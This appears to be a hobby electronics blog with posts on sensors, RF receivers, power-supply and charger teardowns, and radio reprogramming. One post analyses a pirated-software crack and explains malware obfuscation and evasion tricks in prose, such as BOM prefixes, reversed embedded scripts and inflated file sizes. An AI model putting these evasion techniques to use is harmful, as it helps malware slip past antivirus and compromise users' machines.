ULTRASONIC WATER LEVEL SENSOR

#106 AJ-SR04M ultrasonic distance sensor for water

Looks like an STM8S003F3 MCU, an unmarked crystal and an unmarked TTL IC
Underside has a 2 pin socket and is quite dirty…

Recently I have had an old mildly annoying problem snowball into a new serious problem…

Every few months the clean water supply from uThukela Water (Pty) Ltd has been switched off for multiple reasons… striking, damaged electric motors due to Eskom, sabotage and other issues to name a few very serious reasons.

So two large 2500L water tanks were installed in series as a backup which worked well for small water issues that would last maybe a week or two.

However, recently there has been no water from uThukela for over a month, and this is very serious.

This event triggered me to investigate water related problems and solutions specifically for my use case.

Order of importance:

  1. I need readily available clean drinking water
  2. Store this water for longer (get extra tanks)
  3. Keep water safely in the tank (no contaminants)
  4. Add sensors to monitor (water level sensor in this case)

For this article I will be focusing on the 4th order of importance since this is a tutorial website mainly about electronics.

Therefore I will start by saying I searched for a suitable water level sensor and came across the JSN-SR04T and clones.

This sensor looks very promising and easy to use with 6 available sensor modes (adding increased diversity).

N.B the copy does not have 6 extra modes which was disappointing considering their price point…

2.2m wire with the sensor at the end.

The copy has 3 modes and is similar to the JSN-SR04T-2.0

Now my goal is to use the JSN-SR04T with an ESP8266 connected via WiFi to send readings to my server every 30s. This unit will be completely powered by solar.

The ESP8266 will also have a LAN dashboard to view the readings in real time over WiFi. A connection to the internet is not needed, so if the internet goes down I can still read the water level values.

Unfortunately, finding a commonly available original JSN-SR04T Ultrasonic Distance Sensor has been quite difficult in South Africa.

I have only been able to find the AJ-SR04M (functions like the JSN-SR04T-2.0), which is a clone but works just like the original. However, I see the price is equivalent to and sometimes even more than the original, which is quite strange. And of course the extra modes are missing…

The waterproof sensor
The sensor is epoxied and completely sealed, and looks easy enough to install

Mode 1: R27 is open.

The sensor returns an analogue signal. The formula to calculate the distance from the data is:

Test distance = (high time * speed of sound (340 m/s)) / 2

Mode 2: R27 = a 47K resistor is soldered.

Every 100ms serial data will be sent in mm.

Serial baud rate: 9600, n, 8, 1.

The frame format is: 0XFF + H_DATA + L_DATA + SUM

  1. 0XFF: marks the start of a frame and is used to detect it;
  2. H_DATA: the upper 8 bits of the distance data;
  3. L_DATA: the lower 8 bits of the distance data;
  4. SUM: the checksum, where 0XFF + H_DATA + L_DATA = SUM (only the low 8 bits)
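A streaming parser for the Mode 2 frame described above, as an added example that is not code from the original post: it validates SUM and resynchronises when a 0xFF inside the data is mistaken for the frame header. The function names and the sample byte stream are constructed for illustration; on the ESP8266 each byte read from the serial port would be passed to `sr04m_feed`.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SR04M_HEADER    0xFF
#define SR04M_FRAME_LEN 4

typedef struct {
    uint8_t  buf[SR04M_FRAME_LEN]; /* frame being assembled */
    size_t   len;                  /* bytes of buf in use */
    unsigned checksum_errors;      /* candidate frames rejected by SUM */
} sr04m_parser;

/* Feed one received UART byte. Returns 1 and writes the distance in mm
 * when a frame with a valid checksum completes, otherwise 0. */
int sr04m_feed(sr04m_parser *p, uint8_t byte, uint16_t *mm)
{
    size_t i = 1;

    if (p->len == 0 && byte != SR04M_HEADER)
        return 0;                      /* still hunting for 0xFF */
    p->buf[p->len++] = byte;
    if (p->len < SR04M_FRAME_LEN)
        return 0;
    /* SUM must equal the low 8 bits of 0xFF + H_DATA + L_DATA. */
    if ((uint8_t)(p->buf[0] + p->buf[1] + p->buf[2]) == p->buf[3]) {
        *mm = (uint16_t)((p->buf[1] << 8) | p->buf[2]);
        p->len = 0;
        return 1;
    }
    /* Bad checksum: the 0xFF we locked onto may really have been L_DATA
     * or SUM. Resync on the next 0xFF already buffered, if there is one. */
    p->checksum_errors++;
    while (i < SR04M_FRAME_LEN && p->buf[i] != SR04M_HEADER)
        i++;
    memmove(p->buf, p->buf + i, SR04M_FRAME_LEN - i);
    p->len = SR04M_FRAME_LEN - i;
    return 0;
}

/* Run a captured byte stream through the parser; returns readings stored. */
size_t sr04m_parse(const uint8_t *data, size_t n, uint16_t *out, size_t max,
                   unsigned *errors)
{
    sr04m_parser p = { {0}, 0, 0 };
    size_t i, count = 0;
    uint16_t mm;

    for (i = 0; i < n; i++)
        if (sr04m_feed(&p, data[i], &mm) && count < max)
            out[count++] = mm;
    *errors = p.checksum_errors;
    return count;
}

/* Constructed sample: tail of an earlier frame (FF FF), a good frame
 * (1953 mm), a frame with a corrupted SUM, then a good frame (511 mm). */
static const uint8_t SAMPLE[] = {
    0xFF, 0xFF,  0xFF, 0x07, 0xA1, 0xA7,
    0xFF, 0x07, 0xA1, 0x00,  0xFF, 0x01, 0xFF, 0xFF
};

int main(void)
{
    uint16_t mm[4];
    unsigned errors;
    size_t i, n = sr04m_parse(SAMPLE, sizeof SAMPLE, mm, 4, &errors);
    for (i = 0; i < n; i++)
        printf("%u mm\n", (unsigned)mm[i]);
    return 0;
}
```
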

Mode 3: R27 = a 120K resistor is soldered.

Good for low power applications.

After the module is powered on, the module enters standby mode.

If the module receives 0X55 it will send data over serial.

Serial baud rate: 9600, n, 8, 1.

Datasheet for the stm8s003f3

ROBOGUARD INTEGRATION

#105 Custom integration sensors with custom receiver

V1.0 breadboard prototype with DIY EEPROM module
V1.0 stripboard soldered prototype with USB and Lipo battery
Testing 2x custom sensors (1x ATTINY85 and 1x ATTINY412) with 433 RF modules

Recently I wanted to integrate the RoboGuard system with some custom sensors on my farming property.

This motivated me to study the hardware and RF protocols used by the RoboGuard.

I would also like to account for multiple RoboGuard transmitters scattered over the property. Each RoboGuard device has 2x PIR sensors and sends an alarm signal once both are triggered.

They also send a heartbeat ping every 15min.

They have a range of roughly 400m from transmitter RoboGuard to receiver HQ.

Testing EEPROM data storage.

Now the RoboGuard system uses 433.92 MHz to send signals to the HQ, however the HQ can only add up to 8 paired RoboGuards.

Once you reach this limit you will need to purchase more RoboGuard units.

For example, if you had 12 RoboGuards, 2 HQ units would be required, but if you wanted an HQ that can store more than 8 you would be out of luck.

Luckily I had made my own custom RoboGuard receiver and was able to add my own DIY sensors to the RoboGuard device ecosystem.

The protocol used is 433.92 MHz ASK and each RoboGuard has 3 signals

  • alarm
  • tamper/learn
  • heartbeat ping

Testing penetration behind galvanised shed (using CY33 module)

Now my receiver needs to store the received device learn UID, and this is done via EEPROM on my board.

Now my custom device receives all signals just like the RoboGuard HQ.

Next is communicating with the TAK Server.

I could swap the 328P for an ESP8266, which allows WiFi connectivity to the internet.

This then allows the device to connect wirelessly.

It still receives RF data from the RoboGuards and just ports these signals over the internet.

In future I will make a device with an integrated WiFi connection, but in this case all I wanted was more zones and an affordable extra device to keep in my laboratory permanently, with the capability to receive 433 MHz signals while walking around the premises if need be.

Overall my unit contains

A speaker
6 push buttons
2000mAH Lipo battery
built in charger
ability to add clients 12 RoboGuards (more depending on EEPROM size)
433 MHz superheterodyne receiver only
logic to handle all these features

Front of the 433 Transmitter
Back of the 433 Transmitter

More info + datasheets and schematics etc. on my GitHub here

LINEAR POWER SUPPLY FROM 1993

#104 Reverse engineering an old linear power supply

Back panel connectors Antronics made by TPW

Recently I came into possession of two working UPS devices from 1993. Both of them had old capacitors and old 12V 7Ah lead acid batteries inside the devices.

First thing I did was clean the cases and the PCBs. Once that was done I replaced the old capacitors and the 12V 7Ah batteries, then I tested both devices. Both work fine but the design is old and a bit dangerous.

Secondary side
Primary side

So I decided to reverse engineer the circuit in order to better understand the design and to see if I could make any improvements to a design I would like to make.

While reversing the PCB I noticed that the mains earth and the GND of the circuit were connected together. I also noticed some discoloration from what looks like heat between the regulator and the transformer. Also the 330 ohm resistor for the LED appeared to be discoloured from what also looks like excessive heat.

Mirrored for reversing
The original schematic I reversed
Schematic after I implemented suggestions

With these issues in mind I also noticed that the heatsink for the LM317T was very small and close to the transformer and the mains 1A fuse was placed after the choke and varistors instead of before them.

In conclusion I decided to choose between a different regulator at a fixed voltage or a chain of 4 LM317Ts providing around 6A of peak current. Since I do not need to adjust my voltage like the original circuit, I should be able to get 13.75V by using a fixed 1k and 10k resistor. I also wanted better heat dissipation and amps, so I will definitely install good heatsinks with thermal compound. Depending on the size of the enclosure I get for the project I may add a fan.

The project files and components list etc. can be found on my Github here.

THE GAP BETWEEN YOU AND MAINS

#103 Dangerous BK-357 USB charger teardown

Listing on Takealot
Claimed output…

While looking for a new multi port USB charger I came across the Model BK-357 sold on Takealot by OQ Trading. This charger had many positive reviews with a 4.1 star rating at the time of writing this article, and for the low price of R149.00 I had to give this device a try.

Caps could potentially be repurposed from e-waste…

Once I received my charger I noticed that the fast charge USB port was working flawlessly but the 3 normal charging USB ports seemed to have current divided between them.

So I decided to open the charger to investigate further. I noticed the bottom part was glued into place and could be pried open carefully with a small screwdriver and spudger.

Primary and secondary sides with a thin line in-between…

Once opened, the PCB was in good condition and contains 2 small switching transformers and a nice fusible resistor that also acts as an inrush limiter, but that’s where the positives end. The interference capacitor was skimped on, and the electrolytic capacitors are all different colours and brands. It’s possible that they have been taken off old junk and re-purposed, which is okay, but they may have a diminished quality, which is almost as alarming as the gap between the primary and secondary sides of the transformers. The biggest gap is around 4.8mm, which is not too bad, but right in the middle the gap closes all the way to 1.3mm!!!

Largest gap is around 4.8mm and the smallest is a whopping 1.3mm!!

This is very dangerous since there is 1.3mm of PCB space between you and mains voltage!!!

I will be posting my findings as a review on Takealot.

When purchasing multiple socketed USB chargers go for the larger, more expensive ones. As you can see in this case the tiny transformers just can’t output enough current on the cheapies.

The article from Europe’s Safety Gate Alerts can be found here. They identified the problems and measured the charger all the way back in December 2021 in Ireland, and here in SA we are happily selling these.

I have also included an article from a Russian review back in March 2021, where the charger was also analysed and determined to be a potential hazard. The article can be found here.

1x fast charge 3x normal charge with current divided by 3

MOTOROLA CM140

#102 Reprogramming an old CM140 radio

Motorola CM140 From 2003.
Testing shows great results.

If you do not have the code plug password or a saved code plug with the radio’s serial number then this post is for you.

I recently came into possession of 2 Motorola CM140 25W radios. These radios belonged to my grandfather’s old security company, which is now dissolved; however, amongst a lot of the kit I was able to save a few gems.

Upon inspection these radios were in immaculate condition despite their age. I was able to power up both radios only to find that they were programmed to one channel, and when I used Commercial Series CPS (customer programming software) I could not read or write to the radio since the code plug was password protected.

Luckily I found a sample code plug for the model of CM140 radio I had. This allowed me to clone and change the password of the radio using the sample code plug. Now I can read/write to the radio.

I have created a step by step document on my GitHub page here.

Schematic For The Programming Cable.
Any 5v TTL Device Can Work.

REVERSING ANB CRACK

#101 Reverse Engineering A Simple Crack

A lot of times the ordinary everyday person is unable to resist using pirated software. After all it’s free and usually works. There is the chance of contracting a virus or other malware, but using reputable “sources” is acceptable because if many comments praise the distributor then obviously the software can be fine, right?

Well…. not necessarily… In some cases bots can create comments and high seed counts, creating the appearance of a well received product. Also, flags as false positives can be used as camouflage. Sometimes the crack installs discreet backdoors, sometimes following the living off the land principle: basically using the files and programs already installed out of the box on Windows or Linux. This makes it very difficult to find the malware as no foreign exe or files are used (at least in the initial stage of infection).

Therefore antivirus software can get stuck with behavior analysis and hash scans. Creating large files (hundreds of megabytes), reversing code and using a BOM to obfuscate are a few little tricks that may be caught by themselves, but layering all these techniques can make the malware almost undetectable.

So I decided to create an example using a real life application and crack I found for IBM Analyst’s Notebook, which is used by private and government organizations, opening a broad portal to many computers. Luckily when I decoded the scripts I did not see anything too suspicious. However, after the patch (DTD.dll) is installed I do not know what behavior the application will show.

The application was downloaded via torrent and yes, all the files were correct; no man in the middle attacks took place.

Three files are present after unzipping IBM i2 Analyst’s Notebook 9.2.3 Multilingual.zip

Luckily Windows CMD and PowerShell are used to copy the crack.

crack.zip
IBM_I2_ANB_V9.2.3.exe
IBM_I2_CHART_READER_V9.2.3.exe

Initial folder contents.

Inside crack.zip
bin.dat
patch.bat
Readme.txt

Crack folder contents.

Interestingly enough, Readme.txt only instructs the user to run patch.bat, although the file DTD.dll is copied to \Program Files (x86)\Common Files\i2 Shared\i2 Analyst’s Notebook 7\Components\DTD.dll

There’s no mention of the i2 Analyst’s Notebook 7 folder and we are presumably installing version 9.2.3.

patch.bat is obfuscated by some carefully chosen bytes at the very beginning of the file that are able to trick file and other charset detection software.

Obfuscated patch.bat file
Taking a peek inside the obfuscated patch.bat file

As referenced by this

However, once we remove the character and save the file, we can see that the .bat file calls PowerShell and then extracts and reverses a script from the bin.dat file, then runs the extracted script in the terminal.

After removing the character
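A defender-side check for the trick described above, as an added example that is not from the original post: it flags a script whose leading byte-order mark announces UTF-16 while the body is plain ASCII. The post does not say which bytes were prepended to patch.bat, so the UTF-16 BOM is an assumption here, and the sample buffers and function names are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

typedef enum { BOM_NONE, BOM_UTF8, BOM_UTF16LE, BOM_UTF16BE } bom_kind;

/* Identify a leading byte-order mark; *skip receives its length. */
bom_kind detect_bom(const uint8_t *d, size_t n, size_t *skip)
{
    *skip = 0;
    if (n >= 3 && d[0] == 0xEF && d[1] == 0xBB && d[2] == 0xBF) {
        *skip = 3;
        return BOM_UTF8;
    }
    if (n >= 2 && d[0] == 0xFF && d[1] == 0xFE) {
        *skip = 2;
        return BOM_UTF16LE;
    }
    if (n >= 2 && d[0] == 0xFE && d[1] == 0xFF) {
        *skip = 2;
        return BOM_UTF16BE;
    }
    return BOM_NONE;
}

/* Returns 1 when a file announces UTF-16 but its body is plain
 * single-byte text. Real UTF-16 script text has a 0x00 byte in every
 * ASCII character, newlines included, so a body that is entirely
 * printable ASCII with bare '\n' bytes contradicts the BOM. */
int bom_contradicts_body(const uint8_t *d, size_t n)
{
    size_t skip, i, newlines = 0;
    bom_kind k = detect_bom(d, n, &skip);

    if (k != BOM_UTF16LE && k != BOM_UTF16BE)
        return 0;
    for (i = skip; i < n; i++) {
        uint8_t c = d[i];
        if (c == '\n')
            newlines++;
        else if (c != '\r' && c != '\t' && (c < 0x20 || c > 0x7E))
            return 0;       /* NUL or non-ASCII byte: not plain text */
    }
    return newlines > 0;
}

/* Constructed samples (not the bytes of the file the post examined). */
static const uint8_t SUSPECT[] = {          /* UTF-16LE BOM + ASCII batch */
    0xFF, 0xFE, '@', 'e', 'c', 'h', 'o', ' ', 'o', 'f', 'f', '\r', '\n',
    'e', 'c', 'h', 'o', ' ', 'h', 'i', '\r', '\n'
};
static const uint8_t GENUINE[] = {          /* real UTF-16LE "@echo\r\n" */
    0xFF, 0xFE, '@', 0, 'e', 0, 'c', 0, 'h', 0, 'o', 0, '\r', 0, '\n', 0
};
static const uint8_t PLAIN[] = { '@', 'e', 'c', 'h', 'o', '\r', '\n' };

int main(void)
{
    printf("suspect=%d genuine=%d plain=%d\n",
           bom_contradicts_body(SUSPECT, sizeof SUSPECT),
           bom_contradicts_body(GENUINE, sizeof GENUINE),
           bom_contradicts_body(PLAIN, sizeof PLAIN));
    return 0;
}
```
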

This 1st PowerShell script checks for admin privilege, then reverses and reads another script from bin.dat.

The 2nd PowerShell script checks the install folders and makes use of the Windows dialogs, then uses VirtualAlloc to copy DTD.dll from the bin.dat file to the \Program Files (x86)\Common Files\i2 Shared\i2 Analyst’s Notebook 7\Components\ directory.

Then it ends with a message box: Patch complete!

Opening DTD.dll with dependency viewer shows only 4 functions.

Methods inside of the DTD.dll file

A VirusTotal scan of DTD.dll shows only 3 positives.

UPSILON REMOTE MONITOR

#100 Monitoring A Line UPS Remotely

Modernizing the old UPSilon 2000 application was a daunting task. My first thought was to read the serial output, but unfortunately the UPS is listed as a HID device and not a simple COM port. So I went down the rabbit hole of trying to communicate with HID devices, which have strict security to combat keyloggers. I tried to use kernel32 and the CreateFile, ReadFile and WriteFile methods but I got access denied. Looking closer, I could read some of the inputs of the UPS HID device, but it was going to take too long to figure out direct communication with the UPS without an SDK or a good example app using USB HID to communicate with a UPS.

Computer Management Hid UPS

Some details of my UPS HID were:

VID = 0001
PID = 0000
Path = \\?\hid#vid_0001&pid_0000#6&7efa158&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
SerialNumber =
Manufacturer = MEC
Product: MEC0003

Communication over USB

So after wasting 2 days I went back to the drawing board. This time, instead of using Wireshark to catch the USB packets, I decided to take a closer look at the UPSilon 2000 application. Unfortunately the .dll's don’t show any useful functions in dependency viewer, so I can’t call C++ functions from them in C#. So next I switched Wireshark to local monitoring and I found some very useful traffic.

tcp.port == 2570 connect as a client and get data
tcp.port == 8652 read the data from the sms server
udp.port == 11541 udp data

Port 8652 allows me to read alerts sent to the SMS server, but instead I redirect them to my C# application.

GET /smssend_hide.cgi?$sms_recptmobile=0123456789&$sms_content=DESKTOP-294DAYV: This is a test message!&$sms_code=1 HTTP/1.1
User-Agent: RUPS2K SMS
Host: 127.0.0.1
Connection: Keep-Alive

Port 2570 allows me to connect over TCP as a client with no auth, and now I get all the stat report strings every 1 second.

(238.7 238.7 238.7 007 50.1 27.4 --.- 00001000

The UDP port 11541 always receives upsXXXcnt001 for constant monitoring and I haven’t observed any other use besides this.

ups000cnt001 – connected ups
upsdiscnt001 – not connected

The exe files communicating between themselves are:
Monw32.exe 11541 UDP listener
RupsMon.exe 2570 TCP listener
UPSilon.exe connects as client

So after finding this info I was able to build a C# app that works in conjunction with UPSilon 2000, but the C# app offers more flexibility such as remote messaging via Telegram or forwarding the stats to a webserver for remote viewing.

The application checks the CD key every time it starts. It connects to an IP in Taiwan, http://upsilon.icv99.net, on port 80; however, if you go to port 8080 you get a webpage with a CD key checking form.
http://59.124.238.71:80
http://upsilon.icv99.net:8080/download_sys/
http://upsilon.icv99.net:8080/download_sys/keycheck.php?cdkey_check=testkey

Reporting serial key and NTFS to home via: http://59.124.238.71

The only thing I couldn’t do was send commands directly to the UPS, because that communication link is done within the UPSilon app itself. However, I am happy with the overall outcome.

Source code of my application can be found on GitHub

CUSTOM MOSFET PCB

#99 Custom WiFi Mosfet PCB with battery backup

Version 1.0 of the protoboard not as appetizing as the schematic…
Reverse side with thicker black wires for the MosFets.

Creating a custom 4ch Mosfet switch PCB with a built in backup 12V battery changeover circuit takes some careful planning. Since I had experience working with mechanical relay versions the task was not too difficult, however it did come with a few extra challenges.
Mosfets require more parts to work reliably, and they also have significantly different ratings when compared to relays. In this case I was using an ESP8266 with 3.3V logic. I had to create an amplifying circuit out of two transistors in order to get around 6.6V to allow the Mosfets to turn on completely, thus allowing me to utilize their max current ratings.

The beginning of prototyping always looks so clean…
Bread Board prototyping is always a good idea before soldering.

On my 4ch PCB I used 3x IRL520N and 1x IRLZ44N N channel Mosfets. The IRLZ44N is the best rated for logic level and also the most expensive and rare here, at least at this time. I also needed a large amount of amps for the LED strips it was going to switch on and off. The other three IRL520N Mosfets will be used with applications using under 5A of current. Technically I could have just used TIP120 NPN transistors but I wanted to keep the entire PCB Mosfet compatible in case I wanted to swap out any chips.

Drawing block diagrams by hand helps the thought process.
Creating a clean schematic in KiCad makes building the board easy.

For more info on the project check it out on Github

COMMON FETS IN SOUTH AFRICA

#98 Commonly available MOSFETS in South Africa

When looking for affordable and commonly available MOSFETs in SA I came across a few candidates.
Now there are mostly big tradeoffs with N-channel logic level MOSFETs, however I find that most of the time I use them instead of relays for slow switching applications.
Most of my projects have not been using PWM so I have not had any issues using the logic MOSFETs. And I find that I use the N-channel MOSFETs almost all the time.

“real fet” characteristics
“fake fet” characteristics


Finding MOSFETs with decent specs for a decent price was quite tricky, but I found a sweet spot with the IRL520N. Now there’s always the chance of getting fake chips and I might have fallen victim to this, but the “fake chip” had specs that were quite close to the “real chip” in a comparison I did between two chips. The fake one also had a slightly larger and glossier form factor.

“real fet” left and the “fake fet” right

These are my top 3 N-channel MOSFETs which are common

  • IRL520N
  • IRLZ44N
  • IRFZ44N

I would like to add some honorable mentions as well. These N-channel MOSFETs are either not common stock with the online stores I use or are way too expensive for a hobbyist, however sometimes they are mandatory requirements for specific projects.

  • IRF3710
  • IRF540N
  • IRF3205

DSTV CUTS CORNERS

#96 A mystery chip causing IR remote trouble

Recently I had to update a DSTV system from the old Explorer to the new HD decoder + remote.
Unfortunately older remotes don’t work with the new decoders, however when you purchase a decoder you get a new remote in the package.

Now I had a bad experience with the B8 remote which brought an even worse issue to light.

The decoder was checked by the technician in the shop and all was well. However, when I set up the decoder at home I noticed the remote was not working, and upon inspection I noticed the orange LED was emitting a very weak signal when I pressed the buttons.

B8 remote

I really did not want to go all the way back to the shop so I opened the remote and I noticed that the IR chip had its numbers filed off… so now the remote also had a mystery chip that I couldn’t search for in order to find potential solutions…

Looking at the PCB everything seemed fine. The traces, solder joints, button pads, and overall condition were good, so the culprit had to be the IR mystery chip. This was confirmed once I received a new remote from the shop after explaining to them what the problem was.

Shaved mystery IR chip

I opened the new remote in order to do a simple comparison. Immediately I noticed that the IR chip in the new remote had text I could read. Literally everything else was the same. I also noticed the orange LED was now shining brightly when the buttons were pressed. Keep in mind that these remote PCBs are exactly the same in version number and part placement. Only the IR IC is different.

Working chip with markings.

So I came to the conclusion that the unmarked mystery chip was the problem. They even went through the hassle of sanding the text off that inferior chip they used. From here on I can only speculate as to why the factory did this. One reason could be to hide the chip from competitors. Also, they could have been using a cheap replacement which obviously failed, yet they still went out to the public. There is a lot to speculate and none of it looks good for DSTV and their made in South Africa labelling. It seems they have been up to some shady business. We will see what else comes out in the future, but for now that’s all I have to say.

Passionate about technology!
